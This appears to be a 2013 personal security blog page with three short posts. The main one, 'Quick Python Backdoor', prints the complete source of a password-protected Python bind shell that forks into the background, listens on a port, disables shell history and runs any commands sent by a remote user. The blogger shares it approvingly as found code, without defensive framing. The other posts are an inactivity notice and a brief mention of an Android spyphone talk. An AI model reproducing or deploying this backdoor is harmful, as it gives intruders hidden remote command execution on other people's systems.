8/10/2013 Inactivity
This Blog will be stoped by academic activities.More comming soon.
8/04/2013 Quick Python Backdoor
Recently I'm improving my python,bash skills and searching about sample code in vxheaven I found this interesting in just 70 lines is pretty awesome all that we can do with it :)
#!/usr/bin/env python ##################### #-----------------------------------------------+ # ._____________________. | # Coded by slav0nic | slav0nic0@gmail.com | | # ^---------------------^ | # Site: slav0nic.xss.ru | #-----------------------------------------------+ #version 1.2.1 # #Use: python wh_bindshell.py [port] [password] | python wh_bindshell.py - for use # default_settings #for make password: # python -c"import md5; print md5.new('you_password').hexdigest()" # #bugz: ctrl+c etc =script stoped=\ (after reconnect it work) from socket import * import os import sys import md5 import popen2 #############_Default_##################### Port=50001 #_default port Pass ='427003594444ed93c9fe9b0b420264e4' #_default password ='slav0nic' simvol='$ ' #_prompt autocommands="unset HISTFILE;uname -a;id" #autostart=) kill_bsh='kbsh' #command for kill bindshell ########################################## if len(sys.argv)>1: Port=int(sys.argv[1]) print '[+]Port=',sys.argv[1] if len(sys.argv)>2: Pass=str(md5.new(sys.argv[2]).hexdigest()) print '[+]New_pass' try: sockobj=socket(AF_INET,SOCK_STREAM) sockobj.bind(('',Port)) sockobj.listen(5) except: print '[-]SocketError',sys.exc_value sys.exit(1) if os.fork()==0: #for start bindshell as proc and exit while 1: connection,address=sockobj.accept() data=connection.recv(1024) getpass=md5.new(data[:-2]) bsh_pid=os.getpid() if getpass.hexdigest()==Pass: if os.fork()==0: info=os.popen(autocommands).read() connection.send(info) while 1: data=connection.recv(1024) if not data:break if data[:-2]==kill_bsh: os.popen('kill '+str(bsh_pid)) sys.exit(0) cmd_res,stdin,stderror=popen2.popen3(data[:-2]) result= cmd_res.read() error=stderror.read() if error: connection.send(error) for i in range(len(data.split())-1): if 'cd' in data.split()[i]: try: os.chdir(data.split()[i+1].split(';')[0]) except: error='[-]Error '+str(sys.exc_value)+'\n' connection.send(error) ###Prompt username=os.popen("whoami").read() adr=os.popen("uname -n").read() if username[:-1]=='root': simvol='# ' path=os.getcwd() promt='['+username[:-1]+'@'+adr[:-1]+' '+path+']'+simvol ### answer=result+promt connection.send(answer) else: connection.close() sys.exit(0)
8/01/2013 How an Android device can becomes a spyphone
Reseacher director Kevin McNamee demoed this hack at the Black Hat cybersecurity conference Wednesday in Las Vegas.
Subscribe to:
Posts (Atom)